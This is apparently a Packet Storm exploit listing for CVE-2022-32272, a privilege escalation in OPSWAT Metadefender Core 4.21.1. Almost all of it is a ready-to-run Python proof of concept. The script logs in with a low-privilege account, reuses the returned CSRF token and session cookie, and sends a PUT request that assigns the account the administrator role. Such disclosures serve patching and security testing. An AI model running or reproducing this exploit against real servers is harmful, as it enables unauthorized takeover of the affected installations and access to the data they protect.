OPSWAT Metadefender Core version 4.21.1 suffers from a privilege escalation vulnerability.
67ed76b4c862c969209c71ff4568ff584d8233722adbde52ad8523f8fddff6cd# Exploit Title: OPSWAT Metadefender Core - Privilege Escalation
# Date: 24 October 2022
# Exploit Author: Ulascan Yildirim
# Vendor Homepage: https://www.opswat.com/
# Version: Metadefender Core 4.21.1
# Tested on: Windows / Linux
# CVE : CVE-2022-32272
# =============================================================================
# This is a PoC for the Metadefender Core Privilege escalation vulnerability.
# To use this PoC, you need a Username & Password.
# The OMS_CSRF_TOKEN allows users to execute commands with higher privileges.
# =============================================================================
#!/usr/bin/env python3
import requests
import json
from getpass import getpass
url = input("Enter URL in this Format (http://website.com): ")
username = input("Username: ")
password = getpass("Password: ")
url_login = url+'/login'
url_user = url+'/user'
logindata = {"user":username,"password":password}
## Get the OMS_CSRF_TOKEN & session cookie
response_login = requests.post(url_login, json = logindata).json()
json_str = json.dumps(response_login)
resp = json.loads(json_str)
token = resp['oms_csrf_token']
session = resp['session_id']
## Prepare Header & Cookie
headers = {
"oms_csrf_token": token,
}
cookie = {
"session_id_ometascan": session
}
## Set Payload to get Admin role
payload = '{"roles": ["1"]}'
response = requests.put(url_user,headers=headers,cookies=cookie,data=payload)
print("Response status code: "+str(response.status_code))
if response.status_code == 200:
print("Expolit Successful!")
else:
print("Exploit Unsuccessful")
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed